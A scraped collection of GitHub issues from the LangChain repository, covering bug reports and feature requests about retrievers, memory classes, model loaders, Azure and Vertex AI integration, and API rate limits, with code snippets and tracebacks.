self, question: str, llm: Optional[BaseLanguageModel] = None, **kwargs: Any
) -> str:
"""Query the vectorstore."""
llm = llm or OpenAI(temperature=0)
chain = RetrievalQA.from_chain_type(
--->llm, retriever=self.vectorstore.as_retriever(), **kwargs
)
return chain.run(question)
def query_with_sources(
self, question: str, llm: Optional[BaseLanguageModel] = None, **kwargs: Any
) -> dict:
"""Query the vectorstore and get back sources."""
llm = llm or OpenAI(temperature=0)
chain = RetrievalQAWithSourcesChain.from_chain_type(
--->llm, retriever=self.vectorstore.as_retriever(), **kwargs
)
return chain({chain.question_key: question})
```
### Motivation
I can't input `VectorStoreRetriever` arguments such as `search_type` or `search_kwargs` into `VectorStoreIndexWrapper.query()`, but I would be able to do that via `VectorStore.as_retriever()`, which `query()` and `query_with_sources()` use anyway.
### Your contribution
If someone isn't already working on this, I can make this change and submit a PR. | Passing VectorStoreRetriever arguments to VectorStoreIndexWrapper.query() | https://api.github.com/repos/langchain-ai/langchain/issues/7376/comments | 1 | 2023-07-07T20:39:29Z | 2023-10-14T20:09:57Z | https://github.com/langchain-ai/langchain/issues/7376 | 1,794,271,625 | 7,376 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
Below is the code which i'm using for another model
```
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.vectorstores import DocArrayInMemorySearch
from langchain.chains import ConversationalRetrievalChain
from langchain.chat_models import ChatOpenAI
from langchain.document_loaders import PyPDFLoader
from langchain.embeddings import HuggingFaceEmbeddings
import llama_cpp
# create a chatbot chain. Memory is managed externally.
qa = ConversationalRetrievalChain.from_llm(
llm=load_model(model_id="TheBloke/orca_mini_v2_7B-GGML", device_type="mps", model_basename="orca-mini-v2_7b.ggmlv3.q4_0.bin"),#ChatOpenAI(model_name=llm_name, temperature=0),
chain_type=chain_type,
retriever=retriever,
return_source_documents=True,
return_generated_question=True,
)
```
I'm loading orca mini model with model_id and model_basename. How to load Vicuna7b, Vicuna13b and Falcon LLM's? And how to change the device type from mps to Cuda?
### Idea or request for content:
_No response_ | How to load Vicuna-7b, Vicuna13-b and Falcon LLM's from langchain through ConversationalRetrievalChain function? | https://api.github.com/repos/langchain-ai/langchain/issues/7374/comments | 0 | 2023-07-07T20:17:44Z | 2023-07-07T20:26:58Z | https://github.com/langchain-ai/langchain/issues/7374 | 1,794,215,961 | 7,374 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
@hwchase17 There's been a reporter from Fortune who are in their words: "launching our A.I. 50 list later this month. LangChain is being considered for the list, and while I've tried to get in touch with Harrison and Ankush in as many ways as possible, I haven't been able to."
They've been trying to get in touch with @hwchase17 for weeks now.
Search for **bdanweiss** on the Discord group.
### Suggestion:
_No response_ | Fortune Reporter trying to get in touch with Chase | https://api.github.com/repos/langchain-ai/langchain/issues/7373/comments | 1 | 2023-07-07T20:07:36Z | 2023-07-10T16:26:16Z | https://github.com/langchain-ai/langchain/issues/7373 | 1,794,191,212 | 7,373 |
[
"langchain-ai",
"langchain"
] | ### System Info
from typing_extensions import Protocol
from langchain.llms import OpenAI
llm = OpenAI(model_name='text-davinci-003', temperature=0.7, max_tokens=512)
print(llm)
-----------------------------------------------------------------------------------------------
ImportError Traceback (most recent call last)
<ipython-input-28-c0d04f63c5e1> in <module>
1 get_ipython().system('pip install typing-extensions==4.3.0')
2 from typing_extensions import Protocol
----> 3 from langchain.llms import OpenAI
4 llm = OpenAI(model_name='text-davinci-003', temperature=0.7, max_tokens=512)
5 print(llm)
~\anaconda3\envs\GPTLLM\lib\site-packages\langchain\__init__.py in <module>
1 """Main entrypoint into package."""
2
----> 3 from importlib import metadata
4 from typing import Optional
5
~\anaconda3\envs\GPTLLM\lib\importlib\metadata\__init__.py in <module>
15 import collections
16
---> 17 from . import _adapters, _meta
18 from ._collections import FreezableDefaultDict, Pair
19 from ._functools import method_cache, pass_none
~\anaconda3\envs\GPTLLM\lib\importlib\metadata\_meta.py in <module>
----> 1 from typing import Any, Dict, Iterator, List, Protocol, TypeVar, Union
2
3
4 _T = TypeVar("_T")
5
ImportError: cannot import name 'Protocol'
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
from langchain.llms import OpenAI
llm = OpenAI(model_name='text-davinci-003', temperature=0.7, max_tokens=512)
print(llm)
### Expected behavior
OpenAI
Params:{model_name, temperature, max_tokens} | from langchain.llms import OpenAI causing ImportError: cannot import name 'Protocol' | https://api.github.com/repos/langchain-ai/langchain/issues/7369/comments | 3 | 2023-07-07T18:30:00Z | 2024-06-08T12:37:41Z | https://github.com/langchain-ai/langchain/issues/7369 | 1,794,024,937 | 7,369 |
[
"langchain-ai",
"langchain"
] | I am using conversational retrieval chain with memory, but I am getting incorrect answers for trivial questions.
Any suggestions what can I do to improve the accuracy of the output?
#memory = ConversationEntityMemory(llm=llm, return_messages=True)
memory=ConversationBufferMemory(memory_key="chat_history",output_key='answer')
chain = ConversationalRetrievalChain.from_llm(
llm = llm,
retriever=retriever,
memory=memory,
get_chat_history=lambda h :h,
return_source_documents=True)

| conversationalRetrievalChain - how to improve accuracy | https://api.github.com/repos/langchain-ai/langchain/issues/7368/comments | 3 | 2023-07-07T18:26:31Z | 2023-10-16T16:06:15Z | https://github.com/langchain-ai/langchain/issues/7368 | 1,794,019,802 | 7,368 |
[
"langchain-ai",
"langchain"
] | ### Feature request
When using the youtube loader. I think it would be useful to take into account the chapters if present.
1. The chapter timecode could be used to know when to chunk. Any chunk inside a chapter timeframe could also contain the same "youtube_chapter_title" metadata.
2. The name of the chapter could added directly inside the transcript. For example as a markdown header. This could be useful for LLM to maintain context over time.
### Motivation
There are useful information present in the youtube chapter title and timecodes that could be of use to LLMs.
Summarizing transcripts would probably be of higher quality if headers are present rather than a huge wall of text.
Adding metadata is always a win.
### Your contribution
Unfortunately not able to help for the time being but wanted to get the idea out there. | use youtube chapter as hints and metadata in the youtube loader | https://api.github.com/repos/langchain-ai/langchain/issues/7366/comments | 13 | 2023-07-07T18:19:36Z | 2024-06-15T18:33:35Z | https://github.com/langchain-ai/langchain/issues/7366 | 1,794,008,740 | 7,366 |
[
"langchain-ai",
"langchain"
] | ### System Info
Python 3.10
Langchain 0.0.226
Windows 11
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
import os, langchain
os.environ['SERPAPI_API_KEY'] = ""
os.environ['OPENAI_API_KEY'] = ""
from langchain.chains import LLMChain
from langchain.agents import ConversationalChatAgent, SelfAskWithSearchChain, AgentExecutor
from langchain.memory import ConversationBufferWindowMemory
from langchain.tools import Tool
from langchain.llms import OpenAI
conversation_buffer_window_memory: ConversationBufferWindowMemory = ConversationBufferWindowMemory(
input_key="input", memory_key="chat_history")
search = langchain.SerpAPIChain()
self_ask_and_search = SelfAskWithSearchChain(llm=OpenAI(), search_chain=search, verbose=True)
tools = [
Tool(
name="Search",
func=self_ask_and_search.run,
description="useful for when you need to answer questions about current events",
)
]
prompt = ConversationalChatAgent.create_prompt(
tools, input_variables=["input", "chat_history", "agent_scratchpad"]
)
llm_chain = LLMChain(
llm=OpenAI(temperature=0), prompt=prompt)
agent = ConversationalChatAgent(
llm_chain=llm_chain, tools=tools, verbose=True)
agent_executor = AgentExecutor.from_agent_and_tools(
agent=agent, tools=tools, verbose=True, memory=conversation_buffer_window_memory)
agent_executor.run('what is the capital of texas?')
```
returns the following error:
(<class 'ValueError'>, ValueError('variable chat_history should be a list of base messages, got '), <traceback object at 0x0000027BA6366E40>)
### Expected behavior
Return the LLM result while updating the memory mechanism. | ConversationBufferWindowMemory returns empty string on empty history instead of empty array. | https://api.github.com/repos/langchain-ai/langchain/issues/7365/comments | 7 | 2023-07-07T17:56:12Z | 2023-12-05T12:07:46Z | https://github.com/langchain-ai/langchain/issues/7365 | 1,793,960,528 | 7,365 |
[
"langchain-ai",
"langchain"
] | ### System Info
the provided class
[langchain/langchain/llms/huggingface_endpoint.py](https://github.com/hwchase17/langchain/blob/370becdfc2dea35eab6b56244872001116d24f0b/langchain/llms/huggingface_endpoint.py)
class HuggingFaceEndpoint(LLM):
has a bug.
it should be
```python
if self.task == "text-generation":
# Text generation return includes the starter text.
text = generated_text[0]["generated_text"]
```
not
```python
text = generated_text[0]["generated_text"][len(prompt) :]
```
the current class will likely just return a 0.
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
llm= HuggingFaceEndpoint(endpoint_url=os.getenv('ENDPOINT_URL'),task="text-generation",
model_kwargs={"temperature":0.7, "max_length":512})
conversation_chain = ConversationalRetrievalChain.from_llm(
llm=llm,
retriever=vectorstore.as_retriever(),
memory=memory
)
```
### Expected behavior
the output is 0 | HuggingFaceEndpoint Class Bug | https://api.github.com/repos/langchain-ai/langchain/issues/7353/comments | 1 | 2023-07-07T14:49:27Z | 2023-07-11T07:06:07Z | https://github.com/langchain-ai/langchain/issues/7353 | 1,793,680,431 | 7,353 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain Version - 0.0.201
Platform - Windows 11
Python - 3.10.11
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. load some text documents to a vector store, i used deeplake
2. load the db
3. call the function, summarizer(db,"Summarize the mentions of google according to their AI program")(defined in attached file)
4. run for chain_type as stuff, it will work, for map_reduce it will fail in retrieval QA Bot
[main.zip](https://github.com/hwchase17/langchain/files/11982265/main.zip)
### Expected behavior
it should work for all the chain types and give results | map_reduce and refine not working with RetrievalQA chain | https://api.github.com/repos/langchain-ai/langchain/issues/7347/comments | 9 | 2023-07-07T13:09:59Z | 2023-11-14T16:08:01Z | https://github.com/langchain-ai/langchain/issues/7347 | 1,793,525,647 | 7,347 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
python environment:
neo4j 5.0.0
neobolt 1.7.17
neo4j version: neo4j-35-apoc:v20220808
报错:
File "D:\Anaconda3\envs\langchain\lib\site-packages\neo4j_sync\io_bolt3.py", line 200, in run
raise ConfigurationError(
neo4j.exceptions.ConfigurationError: Database name parameter for selecting database is not supported in Bolt Protocol Version(3, 0). Database name 'neo4
### Suggestion:
_No response_ | Issue: When implementing Cypher Search using neo4j environment | https://api.github.com/repos/langchain-ai/langchain/issues/7346/comments | 5 | 2023-07-07T13:00:11Z | 2023-10-28T16:05:40Z | https://github.com/langchain-ai/langchain/issues/7346 | 1,793,511,650 | 7,346 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I am looking for loading OPEN API yaml file into vertex ai llm model. Langchain provides that for OPENAI but not for vertex ai. This is how I currently write code in Open AI. I want a similar functionality for Vertex AI
spec = OpenAPISpec.from_file("sample.yaml")
openai_fns, call_api_fn = openapi_spec_to_openai_fn(spec)
### Motivation
I am creating on a GENAI chatbot for my company where customers can ask questions specific to our product. I need to return the answers of those queries using our internal API's. To query those API's, I need to know which API to call and the API parameters filled as per the user query. For that, I need vertex ai function calling support to query it.
Is there already a way in vertex ai which does this? Kindly help me on this.
### Your contribution
I can help on the issue if anything is required. | Load OPEN API yaml file to vertex ai LLM model | https://api.github.com/repos/langchain-ai/langchain/issues/7345/comments | 1 | 2023-07-07T12:36:51Z | 2023-10-14T20:10:17Z | https://github.com/langchain-ai/langchain/issues/7345 | 1,793,476,844 | 7,345 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I want to download a large file, 5,000,000 characters, and I get an error: openai.error.RateLimitError: Rate limit reached for default-text-embedding-ada-002 in organization org-DOqIVFPozlLEOcvlTbpvpcKt on tokens per min. Limit: 150000 / min. Current: 0 / min. Contact us through our help center at help.openai.com if you continue to have issues. Please add a payment method to your account to increase your rate limit. Visit https://platform.openai.com/account/billing to add a payment method.
My code:
`class Agent:
def __init__(self, openai_api_key: str | None = None) -> None:
self.key = openai_api_key
self.embeddings = OpenAIEmbeddings(openai_api_key=openai_api_key, request_timeout=120, max_retries=10)
self.text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=200)
self.llm = ChatOpenAI(temperature=0, openai_api_key=openai_api_key, max_tokens=500, model_name="gpt-3.5-turbo-16k")
self.chat_history = None
self.chain = None
self.db = None
def ask(self, question: str) -> str:
response = self.chain({"question": question, "chat_history": self.chat_history})
response = response["answer"].strip()
self.chat_history.append((question, response))
return response
def ingest(self, file_path) -> None:
loader = TextLoader(file_path, encoding="utf-8")
documents = loader.load()
splitted_documents = self.text_splitter.split_documents(documents)
if self.db is None:
self.db = FAISS.from_documents(splitted_documents, self.embeddings)
self.chain = ConversationalRetrievalChain.from_llm(self.llm, self.db.as_retriever())
self.chat_history = []
else:
self.db.add_documents(splitted_documents)
def forget(self) -> None:
self.db = None
self.chain = None
self.chat_history = None`
Is there a solution to this problem?
### Suggestion:
_No response_ | Issue: openai.error.RateLimitError: Rate limit reached for default-text-embedding-ada-002 in organization | https://api.github.com/repos/langchain-ai/langchain/issues/7343/comments | 20 | 2023-07-07T11:34:51Z | 2024-03-12T03:27:18Z | https://github.com/langchain-ai/langchain/issues/7343 | 1,793,386,363 | 7,343 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Inferring query filters from natural language is powerful. The SelfQuery retriever is a great implementation but is not yet compatible with Elasticseach.
### Motivation
Choosing Elasticsearch as a vector store is interesting in terms of hybrid search.
It also makes sense when you have an established infrastructure and technical expertise.
### Your contribution
cc: @jeffvestal, @derickson | Create a built in translator for SelfQueryRetriever for Elasticsearch | https://api.github.com/repos/langchain-ai/langchain/issues/7341/comments | 2 | 2023-07-07T10:53:34Z | 2023-11-21T16:06:47Z | https://github.com/langchain-ai/langchain/issues/7341 | 1,793,313,012 | 7,341 |
[
"langchain-ai",
"langchain"
] | ### System Info
LangChain v0.0.225, Ubuntu 22.04.2 LTS, Python 3.10
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I'm executing [https://github.com/hwchase17/langchain/blob/master/docs/extras/modules/model_io/models/llms/integrations/gpt4all.ipynb](url) code on my local machine, IDE is VSCode
Getting this error - **AttributeError: 'Model' object has no attribute '_ctx'**

### Expected behavior

| langchain + gpt4all | https://api.github.com/repos/langchain-ai/langchain/issues/7340/comments | 6 | 2023-07-07T10:43:13Z | 2023-11-28T16:09:46Z | https://github.com/langchain-ai/langchain/issues/7340 | 1,793,294,393 | 7,340 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
Hello everyone,
I've tried numerous approaches, but every time I attempt to transcribe a video from Google, the Whisper task gets terminated.
Does anyone have any suggestions?
```
def youtube_transcript(query: str) -> str:
# Use the URL of the YouTube video you want to download
youtube_url = [get_input_writing(query)]
# -------------
# Directory to save audio files
save_dir = "/home/ds_logos_2/transcripts"
# Transcribe the videos to text
loader = GenericLoader(YoutubeAudioLoader(youtube_url, save_dir), OpenAIWhisperParser())
docs = loader.load()
# Combine doc
combined_docs = [doc.page_content for doc in docs]
text = " ".join(combined_docs)
# Save the transcription to a text file
with open('/home/davesoma/transcripts/transcript.txt', 'w') as f:
f.write(text)
```
```
[youtube] -hxeDjAxvJ8: Downloading webpage
[youtube] -hxeDjAxvJ8: Downloading ios player API JSON
[youtube] -hxeDjAxvJ8: Downloading android player API JSON
[youtube] -hxeDjAxvJ8: Downloading m3u8 information
[info] -hxeDjAxvJ8: Downloading 1 format(s): 140
[download] Destination: /home/davesoma/ds_logos_2/transcripts/Marc Andreessen: Future of the Internet, Technology, and AI | Lex Fridman Podcast #386.m4a
[download] 100% of 177.41MiB in 00:00:18 at 9.52MiB/s
[FixupM4a] Correcting container of "/home/davesoma/ds_logos_2/transcripts/Marc Andreessen: Future of the Internet, Technology, and AI | Lex Fridman Podcast #386.m4a"
[ExtractAudio] Not converting audio /home/davesoma/ds_logos_2/transcripts/Marc Andreessen: Future of the Internet, Technology, and AI | Lex Fridman Podcast #386.m4a; fil
e is already in target format m4a Transcribing part 1!
Killed
``` | Issue: Whisper terminates YouTube transcriptions. | https://api.github.com/repos/langchain-ai/langchain/issues/7339/comments | 3 | 2023-07-07T10:39:03Z | 2023-10-14T20:10:22Z | https://github.com/langchain-ai/langchain/issues/7339 | 1,793,287,416 | 7,339 |
[
"langchain-ai",
"langchain"
] | ### Feature request
I have been trying to delete custom redis data using langchain. But the search feature only returns the document and the metadata with similarity score. Hence I modified the code to return the document ID along with the document data. The id will be helpful for manual deletion of certain elements.
### Motivation
The retrieval of document ID from the redis semantic search will help me to systematically modify the wrong data with right ones after filtering it using LLMs.
### Your contribution
Yes I have fixed the redis part to retrieve the document ID from semantic search. I will fix the issue if the pull request is allowed. | Add feature to get document ID from redis after redis search document retrieval. | https://api.github.com/repos/langchain-ai/langchain/issues/7338/comments | 2 | 2023-07-07T10:29:51Z | 2023-10-06T16:04:59Z | https://github.com/langchain-ai/langchain/issues/7338 | 1,793,271,619 | 7,338 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
I am doing the pdf question answering using the below code.
Note: I am integrated the ConversationBufferMemory for keeping my chat in the memory
```
from langchain.document_loaders import PyPDFLoader
from langchain.embeddings import HuggingFaceEmbeddings
from langchain.memory import ConversationBufferMemory
from langchain.vectorstores import Chroma
from langchain.chains import ConversationalRetrievalChain
from langchain.llms import Cohere
import os
os.environ["COHERE_API_KEY"] = "cohere key"
model = Cohere(model="command-xlarge")
embeddings = HuggingFaceEmbeddings(model_name='sentence-transformers/all-MiniLM-L6-v2')
pdf_path = "file.pdf"
loader = PyPDFLoader(pdf_path)
pages = loader.load_and_split()
vectordb = Chroma.from_documents(pages, embedding=embeddings,
persist_directory=".")
vectordb.persist()
memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True)
pdf_qa = ConversationalRetrievalChain.from_llm(model, vectordb.as_retriever(), memory=memory)
while True:
query = input("Enter the question\n")
result = pdf_qa({"question": query})
print("Answer:")
print(result["answer"])
```
Actually what happening here?
I am observing that memory is not keeping updated here, because if I am asking any question related to the previous context, it is unable to answer.
Is my method is correct?
### Suggestion:
_No response_ | Working of ConversationBufferMemory in the context of document based question answering | https://api.github.com/repos/langchain-ai/langchain/issues/7337/comments | 1 | 2023-07-07T10:12:08Z | 2023-10-14T20:10:27Z | https://github.com/langchain-ai/langchain/issues/7337 | 1,793,238,048 | 7,337 |
[
"langchain-ai",
"langchain"
] | I want pass "chat_history" to the agents like :
```python
...
agent = initialize_agent(tools, llm, agent=AgentType.OPENAI_FUNCTIONS, verbose=True)
response = agent.run({"input": {"chat_history": _message_to_tuple(history), "question": query}})
```
but got an error. how can i pass 'chat_history' to the agent?
### Suggestion:
_No response_ | Issue: question about agents | https://api.github.com/repos/langchain-ai/langchain/issues/7336/comments | 6 | 2023-07-07T09:49:22Z | 2023-10-19T16:06:33Z | https://github.com/langchain-ai/langchain/issues/7336 | 1,793,196,340 | 7,336 |
[
"langchain-ai",
"langchain"
] | ### System Info
Hello,
I am trying to use AzureChatOpenAI to develop a QA system with memory. For that purpose, I have the following code:
```python
import faiss
import pickle
from langchain.chat_models import AzureChatOpenAI
from langchain.memory import ConversationBufferMemory
from langchain.chains import ConversationalRetrievalChain
from langchain.schema import HumanMessage
memory = ConversationBufferMemory(
memory_key="chat_history",
return_messages=True
)
# Load the LangChain.
index = faiss.read_index("docs.index")
with open("faiss_store.pkl", "rb") as f:
store = pickle.load(f)
AZURE_BASE_URL = "{MY_BASE_URL}.openai.azure.com/"
AZURE_OPENAI_API_KEY = "MY_API_KEY"
DEPLOYMENT_NAME = "chat"
llm = AzureChatOpenAI(
openai_api_base=AZURE_BASE_URL,
openai_api_version="2023-03-15-preview",
deployment_name="chat",
openai_api_key=AZURE_OPENAI_API_KEY,
openai_api_type="azure",
temperature=0.01
)
retriever = store.as_retriever()
qa = ConversationalRetrievalChain.from_llm(
llm,
retriever=retriever,
memory=memory
)
user_input = "Question?"
result = qa({"question": user_input})
print(result)
```
This code is raising the following error:
```
openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again.
```
I have tried using AzureChatOpenAI in other ways and it is working without any problem, using the same deployed model in Azure:
```python
AZURE_BASE_URL = "{MY_BASE_URL}.openai.azure.com/"
AZURE_OPENAI_API_KEY = "MY_API_KEY"
DEPLOYMENT_NAME = "chat"
llm = AzureChatOpenAI(
openai_api_base=AZURE_BASE_URL,
openai_api_version="2023-03-15-preview",
deployment_name="chat",
openai_api_key=AZURE_OPENAI_API_KEY,
openai_api_type="azure",
temperature=0.01
)
chain = load_qa_chain(llm=llm, chain_type="map_reduce")
```
Therefore, the problem is not about the deployment I made in Azure, it seems to work fine in other situations.
Am I missing something when using ConversationalRetrievalChain with AzureChatOpenAI? I have tried so many things and nothing seems to work.
Thanks in advance for any help.
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [x] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Declare the LLM using AzureChatOpenAI:
```python
AZURE_BASE_URL = "{MY_BASE_URL}.openai.azure.com/"
AZURE_OPENAI_API_KEY = "MY_API_KEY"
DEPLOYMENT_NAME = "chat"
llm = AzureChatOpenAI(
openai_api_base=AZURE_BASE_URL,
openai_api_version="2023-03-15-preview",
deployment_name="chat",
openai_api_key=AZURE_OPENAI_API_KEY,
openai_api_type="azure",
temperature=0.01
)
```
2. Declare the ConversationBufferMemory:
```python
memory = ConversationBufferMemory(
memory_key="chat_history",
return_messages=True
)
```
3. Load FAISS index:
```python
# Load the LangChain.
index = faiss.read_index("docs.index")
with open("faiss_store.pkl", "rb") as f:
store = pickle.load(f)
```
4. Declare and run the ConversationalRetrievalChain:
```python
qa = ConversationalRetrievalChain.from_llm(
llm,
retriever=retriever,
memory=memory
)
user_input = "Question?"
result = qa({"question": user_input})
print(result)
```
### Expected behavior
Error raised:
```
openai.error.InvalidRequestError: The API deployment for this resource does not exist. If you created the deployment within the last 5 minutes, please wait a moment and try again.
``` | AzureChatOpenAI raises The API deployment for this resource does not exist when used with ConversationalRetrievalChain | https://api.github.com/repos/langchain-ai/langchain/issues/7331/comments | 3 | 2023-07-07T08:41:48Z | 2024-02-20T21:07:36Z | https://github.com/langchain-ai/langchain/issues/7331 | 1,793,084,323 | 7,331 |
[
"langchain-ai",
"langchain"
] | ### System Info
I intend to use the conversation summary buffer memory with ChatOpenAI in a conversation chain. For the chat, there's a need to set the system message to instruct and give appropriate personality to the chat assistant. However, system message is not supported to be inserted in the memory either via the save_context (the documented way) or the memory.chat_memory.message.insert()
The summary of the chat itself seems to use the system message to send the summary. This makes Conversation Summary Buffer Memory incompatible with ChatOpenAI.
### Who can help?
@hwchase17 @agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Using either of the two methods to use the system message
1. memory.chat_memory.messages.insert(0, system_message)
2. memory.save_context({"input": SystemMessage(content=system_message)}, {"output": ""})
### Expected behavior
We should be able to use any memory with ChatOpenAI as these need to be modular but ConversationSummaryBufferMemory seems incompatible with it due to system message. | Conversation Summary Buffer Memory does not accept a system message | https://api.github.com/repos/langchain-ai/langchain/issues/7327/comments | 8 | 2023-07-07T07:27:42Z | 2024-07-29T01:54:55Z | https://github.com/langchain-ai/langchain/issues/7327 | 1,792,965,212 | 7,327 |
[
"langchain-ai",
"langchain"
] | I've got a GoogleDriveLoader implemented with a exponential backoff and a sleep function to try further mitigate rate limits, but I still get rate limit errors from Google.
Even though I've added a time.sleep(5) statement, I assume it only takes effect before each attempt to load all the documents, not between individual API calls within the load() method.
```
google_loader = GoogleDriveLoader(
folder_id="xxxxxxxxx",
credentials_path="credentials.json",
token_path="token.json",
file_types=["document", "sheet", "pdf"],
file_loader_cls=UnstructuredFileIOLoader,
recursive=True,
verbose=True,
)
@retry(
stop=stop_after_attempt(7), wait=wait_exponential(multiplier=2, min=60, max=300)
)
def load_documents():
time.sleep(5) # delay for 5 seconds
return google_loader.load()
try:
google_docs = load_documents()
except:
logging.error("Exceeded retry attempts for Google API rate limit.")
raise
```
The exception output:
```
ERROR:root:Exceeded retry attempts for Google API rate limit.
IndexError: list index out of range
```
Stacktrace:
```
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/A_xx?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/A_xx?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/A_xx?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/BF%20IS?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/BF%20BS%20?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Reporting%20IS?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Reporting%20BS?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Statistics?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Val_Summary?alt=json
DEBUG:googleapiclient.discovery:URL being requested: GET https://sheets.googleapis.com/v4/spreadsheets/xxxxx-xxxxx/values/Val_Workings?alt=json
ERROR:root:Exceeded retry attempts for Google API rate limit.
Traceback (most recent call last):
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/tenacity/__init__.py", line 382, in __call__
result = fn(*args, **kwargs)
File "/Users/chris/Repositories/xxxx/ingest.py", line 44, in load_documents
return google_loader.load()
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/langchain/document_loaders/googledrive.py", line 347, in load
return self._load_documents_from_folder(
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/langchain/document_loaders/googledrive.py", line 248, in _load_documents_from_folder
returns.extend(self._load_sheet_from_id(file["id"])) # type: ignore
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/langchain/document_loaders/googledrive.py", line 173, in _load_sheet_from_id
header = values[0]
IndexError: list index out of range
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/Users/chris/Repositories/xxxx/ingest.py", line 68, in <module>
ingest_docs()
File "/Users/chris/Repositories/xxxx/ingest.py", line 47, in ingest_docs
google_docs = load_documents()
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/tenacity/__init__.py", line 289, in wrapped_f
return self(f, *args, **kw)
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/tenacity/__init__.py", line 379, in __call__
do = self.iter(retry_state=retry_state)
File "/Users/chris/Repositories/xxxx/.venv/lib/python3.10/site-packages/tenacity/__init__.py", line 326, in iter
raise retry_exc from fut.exception()
tenacity.RetryError: RetryError[<Future at 0x142dfab30 state=finished raised IndexError>]
```
### Suggestion:
Due to the recursive function, and the use case for most people being to load a large Drive folder, would it be possible to implement a rate limiter into the loader itself to slow down the individual API calls?
